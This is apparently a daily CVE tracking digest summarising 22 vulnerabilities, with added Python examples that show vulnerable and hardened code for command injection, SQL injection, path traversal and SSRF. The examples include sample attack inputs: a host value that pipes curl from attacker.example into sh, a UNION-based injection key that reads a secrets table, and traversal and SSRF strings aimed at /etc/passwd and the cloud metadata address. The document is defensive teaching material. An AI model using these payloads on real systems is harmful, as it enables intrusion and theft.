22 CVEs tracked today. 1 Critical, 2 High, 8 Medium, 11 Low.
-
CVE-2025-67511
CRITICAL
CVSS 9.6
A critical command injection vulnerability exists in the Cybersecurity AI (CAI) framework, versions 0.5.9 and below: the run_ssh_command_with_credentials() function, which is accessible to AI agents, passes the SSH username, host and port parameters to a command without sanitization, so whoever controls those values can execute arbitrary commands on the host running CAI. Because the function is reachable by agents, any input that steers an agent's choice of SSH parameters can reach the injection point. A public proof-of-concept exploit exists and the flaw enables remote code execution with potential for complete system compromise, although the EPSS score of 0.12% indicates a relatively low probability of real-world exploitation despite the CVSS rating of 9.6.
RCE
Command Injection
SSH
AI / ML
Cybersecurity Ai
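The bug class above (SSH connection parameters reaching a command unvalidated) is easiest to see beside its fix. The Python below is an added example written for this page, not code from the CAI project: the function names, the shell-string construction used to illustrate the vulnerable pattern and the sample inputs are assumptions, and the advisory does not state how CAI built the command internally.

```python
# Added illustrative example; this is not CAI's code. Function names, the
# shell-string construction and the sample inputs are assumptions made to
# demonstrate the bug class in CVE-2025-67511.
import ipaddress
import re
import subprocess


def build_ssh_command_vulnerable(username: str, host: str, port: str, command: str) -> str:
    """Bug class: agent-controlled parameters interpolated into a shell string.

    Anything the shell treats specially in username/host/port (';', '|',
    '$(...)', backticks) runs on the *local* machine before ssh even starts.
    """
    return f"ssh -p {port} {username}@{host} {command}"


# Allowlists for the three parameters an agent may supply. fullmatch() is used
# so a trailing newline cannot slip past a '$'-anchored pattern.
_USERNAME_RE = re.compile(r"[a-z_][a-z0-9_.-]{0,31}")
_LABEL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")
_PORT_RE = re.compile(r"[0-9]{1,5}")  # int() alone would accept "2_2" and " 22 "


def validate_username(username: str) -> str:
    if not _USERNAME_RE.fullmatch(username):
        raise ValueError(f"invalid username: {username!r}")
    return username


def validate_host(host: str) -> str:
    """Accept an IPv4/IPv6 literal or a DNS hostname; nothing else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    labels = host.split(".")
    if 0 < len(host) <= 253 and all(_LABEL_RE.fullmatch(label) for label in labels):
        return host
    raise ValueError(f"invalid host: {host!r}")


def validate_port(port: str) -> int:
    if not _PORT_RE.fullmatch(str(port)) or not 1 <= int(port) <= 65535:
        raise ValueError(f"invalid port: {port!r}")
    return int(port)


def build_ssh_argv(username: str, host: str, port: str, command: str) -> list[str]:
    """Hardened form: validated parameters passed as an argv list, no shell.

    '--' ends option parsing, so a user or host beginning with '-' cannot be
    turned into an ssh option such as -oProxyCommand=... . The remote command
    is still interpreted by the remote login shell; that is ssh's contract and
    the target's trust boundary, not the local host's.
    """
    user = validate_username(username)
    target = validate_host(host)
    p = validate_port(port)
    return ["ssh", "-p", str(p), "--", f"{user}@{target}", command]


def run_ssh_command(username: str, host: str, port: str, command: str, timeout: int = 30):
    """Execute without a shell. Not invoked in the offline demo below."""
    argv = build_ssh_argv(username, host, port, command)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)


def is_rejected(username: str, host: str, port: str, command: str = "id") -> bool:
    """True if the hardened builder refuses these parameters."""
    try:
        build_ssh_argv(username, host, port, command)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload: a host value carrying shell metacharacters.
    evil_host = "10.0.0.5; curl http://attacker.example/x | sh"
    print(build_ssh_command_vulnerable("root", evil_host, "22", "uptime"))
    print(build_ssh_argv("root", "10.0.0.5", "22", "uptime"))
    print(is_rejected("root", evil_host, "22"))  # True
```

The hardened builder rejects anything outside the allowlists and hands ssh an argv list, so no local shell ever interprets the parameters; in an agent framework the same validation belongs at the tool boundary, since any text that steers the agent's choice of host or username can reach this function.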
-
CVE-2025-67648
HIGH
CVSS 7.1
Shopware, an open commerce platform, contains a reflected cross-site scripting (XSS) vulnerability in its authentication controller: the 'waitTime' URL parameter from the login page is rendered directly into the Twig template without validation or sanitization, so a crafted URL can inject JavaScript into the page. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 are affected. The EPSS score of 0.04% (11th percentile) suggests little active exploitation, even though patches and public advisories are available.
PHP
XSS
Shopware
-
CVE-2025-67644
HIGH
CVSS 7.3
A SQL injection vulnerability exists in LangGraph SQLite Checkpoint, an implementation of the LangGraph CheckpointSaver for SQLite databases. Versions 3.0.0 and below of the langgraph-checkpoint-sqlite Python package are affected: metadata filter keys passed to checkpoint search operations are not validated, allowing an attacker with local access and low privileges to manipulate the resulting SQL query. A proof-of-concept exploit is publicly available, though the EPSS score of 0.02% (6th percentile) suggests minimal active exploitation at present.
SQLi
Langgraph Checkpoint Sqlite
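The distinguishing point of this bug is that the filter values may be bound correctly while the keys are still spliced into the SQL text. The Python below is an added example, not code from langgraph-checkpoint-sqlite: the table layout, the secrets table standing in for any other data reachable on the same connection, the function names and the payload are all constructed for the demonstration.

```python
# Added illustrative example; this is not the langgraph-checkpoint-sqlite code.
# Table layout, function names, sample rows and the payload are constructed to
# demonstrate the bug class in CVE-2025-67644.
import json
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed checkpoint rows plus a 'secrets'
    table standing in for whatever else the same connection can reach."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE checkpoints (thread_id TEXT, metadata TEXT)")
    conn.executemany(
        "INSERT INTO checkpoints VALUES (?, ?)",
        [
            ("t1", json.dumps({"source": "input", "step": 1})),
            ("t2", json.dumps({"source": "loop", "step": 2})),
        ],
    )
    conn.execute("CREATE TABLE secrets (value TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('api-key-123')")
    return conn


def search_vulnerable(conn: sqlite3.Connection, metadata_filter: dict) -> list:
    """Bug class: values are bound, but each filter *key* is spliced into the
    JSON path literal, so a key containing a quote breaks out of '$.<key>'."""
    clauses, params = [], []
    for key, value in metadata_filter.items():
        clauses.append(f"json_extract(metadata, '$.{key}') = ?")
        params.append(value)
    where = (" WHERE " + " AND ".join(clauses)) if clauses else ""
    return conn.execute("SELECT thread_id, metadata FROM checkpoints" + where, params).fetchall()


# Keys must look like identifiers; fullmatch() so a trailing newline cannot pass.
_KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def search_hardened(conn: sqlite3.Connection, metadata_filter: dict) -> list:
    """Allowlist the key's shape *and* bind the JSON path itself, so caller
    input never becomes SQL syntax even if the allowlist is later loosened."""
    clauses, params = [], []
    for key, value in metadata_filter.items():
        if not isinstance(key, str) or not _KEY_RE.fullmatch(key):
            raise ValueError(f"invalid metadata key: {key!r}")
        clauses.append("json_extract(metadata, ?) = ?")
        params.extend([f"$.{key}", value])
    where = (" WHERE " + " AND ".join(clauses)) if clauses else ""
    return conn.execute("SELECT thread_id, metadata FROM checkpoints" + where, params).fetchall()


# Constructed payload: closes the path literal, consumes the one remaining
# placeholder so the binding count still matches, UNIONs in another table and
# comments out the tail of the template.
INJECTED_KEY = "x') IS NOT NULL AND ? = '1' UNION SELECT value, value FROM secrets -- "


def hardened_rejects(key: str) -> bool:
    try:
        search_hardened(make_db(), {key: "1"})
    except ValueError:
        return True
    return False


def demo() -> dict:
    conn = make_db()
    return {
        "normal": [r[0] for r in search_vulnerable(conn, {"source": "input"})],
        "injected": [r[0] for r in search_vulnerable(conn, {INJECTED_KEY: "1"})],
        "hardened_normal": [r[0] for r in search_hardened(conn, {"source": "input", "step": 1})],
    }


if __name__ == "__main__":
    print(demo())  # {'normal': ['t1'], 'injected': ['api-key-123'], 'hardened_normal': ['t1']}
    print(hardened_rejects(INJECTED_KEY))  # True
```

The vulnerable search returns a row from the secrets table for a filter that, to the caller, looks like an ordinary metadata lookup; the hardened version refuses the key before any SQL is built, and because the JSON path is itself a bound parameter, a weaker allowlist would still not turn a key into SQL.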
-
CVE-2025-14537
MEDIUM
CVSS 5.5
A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. An unknown function of the file /preview7.php is affected: manipulating the course_year_section/semester argument leads to SQL injection. Remote exploitation of the attack is possible....
PHP
SQLi
Class And Exam Timetable Management System
-
CVE-2025-14536
MEDIUM
CVSS 5.5
A security flaw has been discovered in code-projects Class and Exam Timetable Management 1.0. An unknown function of the file /index.php in the Login component is affected: manipulating the username/password argument leads to SQL injection. The attack may be launc...
PHP
SQLi
Class And Exam Timetable Management System
-
CVE-2025-14529
MEDIUM
CVSS 5.5
A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. An unknown function of the file /admin/admin_running.php is affected: manipulating the pid argument leads to SQL injection. The attack can be initiated remotely. The exploit has been published and...
PHP
SQLi
Retro Basketball Shoes Online Store
-
CVE-2025-14527
MEDIUM
CVSS 5.5
A weakness has been identified in projectworlds Advanced Library Management System 1.0. Unknown code in the file /view_book.php is affected: manipulating the book_id argument leads to SQL injection. The attack can be executed remotely. The exploit has been made avail...
PHP
SQLi
Advanced Library Management System
-
CVE-2025-14515
MEDIUM
CVSS 5.5
A vulnerability has been found in Campcodes Supplier Management System 1.0. An unknown function of the file /admin/add_unit.php is affected: manipulating the txtunitDetails argument leads to SQL injection. The attack can be launched remotely. The exploit has been d...
PHP
SQLi
Supplier Management System
-
CVE-2025-14514
MEDIUM
CVSS 5.5
A flaw has been found in Campcodes Supplier Management System 1.0. An unknown function of the file /admin/add_distributor.php is affected: manipulating the txtDistributorAddress argument leads to SQL injection. The attack can be initiated remotely. The exploit has been published and may be use...
PHP
SQLi
Supplier Management System
-
CVE-2025-14512
MEDIUM
CVSS 6.5
An integer overflow in GLib's GIO escape_byte_string() function can lead to a heap buffer overflow and denial of service when malicious filesystem attribute values are processed over the network. It affects GLib as shipped in GNOME, Red Hat Enterprise Linux 7 through 10 and OpenShift 4.0 and later; exploitation needs only unauthenticated network access plus user interaction. The EPSS score of 0.07% (22nd percentile) indicates low exploitation probability despite the CVSS of 6.5, consistent with the attack depending on specific file/attribute handling conditions; no public exploit or active exploitation (CISA KEV) was confirmed at analysis time.
Buffer Overflow
Integer Overflow
-
CVE-2025-14293
MEDIUM
CVSS 6.5
WP Job Portal plugin for WordPress allows authenticated attackers with Subscriber-level access to read arbitrary files on the server through path traversal in the downloadCustomUploadedFile function, potentially exposing configuration files, database credentials or other confidential data. All versions up to and including 2.4.0 are affected. The CVSS score of 6.5 reflects the high confidentiality impact combined with low attack complexity and only basic authenticated access being required.
WordPress
Path Traversal
-
CVE-2025-14538
LOW
CVSS 2.0
Reflected cross-site scripting (XSS) in yangshare warehouseManager 仓库管理系统 (Warehouse Management System) 1.1.0 allows authenticated remote attackers to inject malicious scripts via the Name parameter in the addCustomer function of CustomerManageHandler.java. User interaction is required for exploitation. Public exploit code is available and the vulnerability has been disclosed publicly.
XSS
-
CVE-2025-14531
LOW
CVSS 2.1
CRLF injection in code-projects Rental Management System 2.0 allows authenticated remote attackers to manipulate log entries via the Log Handler component in Transaction.java, enabling log tampering with minimal real-world impact. The vulnerability requires prior authentication (PR:L), has low integrity impact, and carries a very low EPSS score (0.07%) despite public exploit availability, suggesting exploitation is limited to specific threat scenarios.
Java
CRLF Injection
Rental Management System
-
CVE-2025-14530
LOW
CVSS 2.0
Unrestricted file upload in SourceCodester Real Estate Property Listing App 1.0 allows high-privileged authenticated users to upload arbitrary files via the image parameter in /admin/property.php, potentially leading to remote code execution. Because the flaw requires high privileges (PR:H), it affects only administrator or similarly privileged accounts; public exploit code exists, but the EPSS score of 0.07% indicates low real-world exploitation probability.
PHP
File Upload
Real Estate Property Listing App
-
CVE-2025-14522
LOW
CVSS 2.1
Unrestricted file upload in baowzh hfly allows authenticated remote attackers to upload arbitrary files by manipulating the imgFile parameter in /Public/Kindeditor/php/upload_json.php. The rolling-release project is affected up to commit 638ff9abe9078bc977c132b37acbe1900b63491c. Public exploit code is available, but the authentication requirement keeps the overall risk low (CVSS 2.1, EPSS 0.07%) compared with an unauthenticated file upload.
PHP
File Upload
Hfly
-
CVE-2025-14521
LOW
CVSS 2.1
Path traversal in baowzh hfly allows authenticated remote attackers to read arbitrary files by manipulating the filename parameter of the /admin/index.php/datafile/download endpoint. Versions up to commit 638ff9abe9078bc977c132b37acbe1900b63491c are affected. Exploit code has been published, and the vendor did not respond to early disclosure notification. The CVSS score of 2.1 reflects limited confidentiality impact, and the low EPSS (0.15%) suggests minimal real-world exploitation despite public disclosure.
PHP
Path Traversal
Hfly
-
CVE-2025-14520
LOW
CVSS 2.1
Arbitrary file deletion via path traversal in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows authenticated remote attackers to delete files by manipulating the filename parameter in /admin/index.php/datafile/delfile. The vulnerability has public exploit code available but remains low-risk due to authentication requirement and limited scope (information integrity impact only).
PHP
Path Traversal
Hfly
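The three path traversal entries (WP Job Portal's downloadCustomUploadedFile, and hfly's datafile/download and datafile/delfile) share one root cause and one fix: resolve the client-supplied name to a real filesystem path and prove it stays inside the intended directory before reading or unlinking. The Python below is an added example, not code from either project; the directory layout, file contents and function names are constructed for the demonstration.

```python
# Added illustrative example; not the WP Job Portal or hfly code. Directory
# layout, file contents and function names are constructed to demonstrate the
# bug class in CVE-2025-14293, CVE-2025-14521 and CVE-2025-14520.
import tempfile
from pathlib import Path


def resolve_under_base(base_dir: Path, user_path: str) -> Path:
    """Map a client-supplied name to a path that is provably inside base_dir.

    Path.resolve() collapses '..' segments and follows symlinks, so the check
    is made on the real location, not on the string the client sent.
    """
    if "\x00" in user_path:
        raise PermissionError("null byte in path")
    base = Path(base_dir).resolve()
    # An absolute user_path *replaces* base in the join; the containment check
    # below catches that without any string inspection of the input.
    candidate = (base / user_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    return candidate


def safe_read(base_dir: Path, user_path: str) -> str:
    target = resolve_under_base(base_dir, user_path)
    if not target.is_file():
        raise FileNotFoundError(user_path)
    return target.read_text()


def safe_delete(base_dir: Path, user_path: str) -> None:
    target = resolve_under_base(base_dir, user_path)
    if not target.is_file():  # never unlink directories or special files
        raise FileNotFoundError(user_path)
    target.unlink()


def is_rejected(base_dir: Path, user_path: str) -> bool:
    try:
        resolve_under_base(base_dir, user_path)
    except PermissionError:
        return True
    return False


def build_demo_tree() -> dict:
    """Constructed layout: <tmp>/uploads/reports/a.txt is the only legitimate
    file; <tmp>/outside/secret.txt stands in for wp-config.php or similar."""
    root = Path(tempfile.mkdtemp())
    base = root / "uploads"
    (base / "reports").mkdir(parents=True)
    (base / "reports" / "a.txt").write_text("quarterly numbers")
    outside = root / "outside"
    outside.mkdir()
    (outside / "secret.txt").write_text("DB_PASSWORD=hunter2")
    symlink_ok = True
    try:  # a symlink planted inside the base must not act as an escape hatch
        (base / "link").symlink_to(outside / "secret.txt")
    except OSError:  # unprivileged Windows, restricted filesystems
        symlink_ok = False
    return {"base": base, "outside": outside, "symlink_ok": symlink_ok}


def demo() -> dict:
    t = build_demo_tree()
    base = t["base"]
    out = {
        "read": safe_read(base, "reports/a.txt"),
        "relative_rejected": is_rejected(base, "../outside/secret.txt"),
        "absolute_rejected": is_rejected(base, str(t["outside"] / "secret.txt")),
        "nested_rejected": is_rejected(base, "reports/../../outside/secret.txt"),
        "symlink_rejected": is_rejected(base, "link") if t["symlink_ok"] else None,
        "secret_exists": (t["outside"] / "secret.txt").exists(),
    }
    safe_delete(base, "reports/a.txt")
    out["deleted"] = not (base / "reports" / "a.txt").exists()
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Checking the resolved path rather than scanning the input for "../" is what makes the delete endpoint safe as well: the file that would be unlinked is the one proven to sit under the base, and is_file() keeps the handler from removing directories or devices.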
-
CVE-2025-14519
LOW
CVSS 2.0
Stored cross-site scripting (XSS) in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows authenticated attackers to inject malicious scripts via the /admin/index.php/advtext/add endpoint in the advtext module; user interaction is required to trigger the payload. Public proof-of-concept code is available. The low CVSS score of 2.0 reflects the authentication and user-interaction requirements, and the EPSS score of 0.05% indicates minimal real-world exploitation probability.
PHP
XSS
Hfly
-
CVE-2025-14518
LOW
CVSS 2.1
Server-side request forgery in PowerJob up to version 5.1.2 allows authenticated remote attackers to manipulate the targetIp and targetPort arguments of the checkConnectivity function in the Network Request Handler component, causing the server to connect to attacker-chosen hosts, with low confidentiality, integrity and availability impact. Public exploit code exists, but the EPSS score of 0.03% indicates minimal real-world exploitation probability.
Java
SSRF
Powerjob
-
CVE-2025-14517
LOW
CVSS 1.9
Yalantis uCrop 2.2.11 contains an improperly exported Android application component (UCropActivity) in AndroidManifest.xml that allows local attackers with application-level privileges to access the component via intent manipulation, potentially disclosing sensitive information. The vulnerability requires local access and user application permissions but affects confidentiality with low impact. Public exploit code is available, though the EPSS score of 0.06% suggests limited real-world exploitation despite public disclosure.
Information Disclosure
Android
Ucrop
-
CVE-2025-14516
LOW
CVSS 2.1
Server-side request forgery in Yalantis uCrop 2.2.11 allows authenticated remote attackers to manipulate the URL handled by the downloadFile function in BitmapLoadTask.java, causing the affected server to issue arbitrary HTTP requests. The vulnerability requires authentication (PR:L) and carries limited confidentiality and integrity impact. Public exploit code exists, and the vendor has not responded to early disclosure attempts.
Java
SSRF
Ucrop
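The PowerJob checkConnectivity entry (targetIp/targetPort) and the uCrop downloadFile entry are the two shapes SSRF usually takes: a raw host and port, or a full URL. The Python below is an added example, not code from either project; the resolver stub, hostnames and addresses are constructed so it runs offline, and real_resolver shows where socket.getaddrinfo would plug in.

```python
# Added illustrative example; not the PowerJob or uCrop code. The resolver stub,
# hostnames, addresses and allowed-port set are constructed to demonstrate the
# bug class in CVE-2025-14518 (host/port) and CVE-2025-14516 (URL).
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 8080, 8443}  # assumption: what the service legitimately talks to


def real_resolver(host: str) -> list[str]:
    """Production resolver: every A/AAAA answer is checked, not just the first."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


# Constructed DNS answers so the demo runs offline. They cover the usual
# suspects: loopback, RFC 1918, the cloud metadata address, an IPv4-mapped IPv6
# form, and a name whose answer set mixes a public and a private address.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1", "::1"],
    "intranet.corp": ["10.0.0.5"],
    "metadata.internal": ["169.254.169.254"],
    "mapped.example.com": ["::ffff:127.0.0.1"],
    "dual.example.com": ["93.184.216.34", "192.168.1.10"],
}


def fake_resolver(host: str) -> list[str]:
    if host not in FAKE_DNS:
        raise ValueError(f"unresolvable host: {host!r}")
    return FAKE_DNS[host]


def check_ip(addr: str) -> str:
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is loopback, not a global v6 host
    if not ip.is_global:  # rejects loopback, private, link-local, CGNAT, multicast, reserved
        raise ValueError(f"non-public address: {addr}")
    return str(ip)


def validate_target(host: str, port: int, resolver=real_resolver) -> list[str]:
    """Return the vetted IPs. Connect to one of *these* (sending the name in
    the Host header) instead of re-resolving; resolving again after the check
    is the window DNS rebinding exploits."""
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    try:
        answers = [str(ipaddress.ip_address(host))]  # literal IP: no lookup
    except ValueError:
        answers = resolver(host)
    if not answers:
        raise ValueError(f"no addresses for {host!r}")
    return [check_ip(a) for a in answers]  # one bad answer rejects the whole set


def validate_url(url: str, resolver=real_resolver) -> tuple[str, int, list[str]]:
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # If the HTTP client follows redirects, disable that and run every
    # Location value back through this function.
    return host, port, validate_target(host, port, resolver)


def is_allowed(url: str, resolver=fake_resolver) -> bool:
    try:
        validate_url(url, resolver)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print(validate_url("https://api.example.com/v1", fake_resolver))
    for u in ("http://localhost:8080/", "http://169.254.169.254/latest/meta-data/",
              "http://mapped.example.com/", "http://dual.example.com/", "file:///etc/passwd"):
        print(u, is_allowed(u))  # all False
```

The check deliberately runs on the resolved addresses rather than on the hostname string, which is why decimal, octal or DNS-tricked forms of 127.0.0.1 do not need their own rules; what still has to be enforced by the caller is using the returned addresses for the actual connection and re-validating every redirect hop.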
-
CVE-2025-14485
LOW
CVSS 1.3
Command injection in EFM ipTIME A3004T firmware version 14.19.0 allows authenticated remote attackers to execute arbitrary commands via malformed input to the aaksjdkfj parameter in the show_debug_screen function of /sess-bin/timepro.cgi. Public exploit code is available, but the vulnerability has a high attack complexity requirement and the vendor has not issued a patch despite early disclosure notification.
Command Injection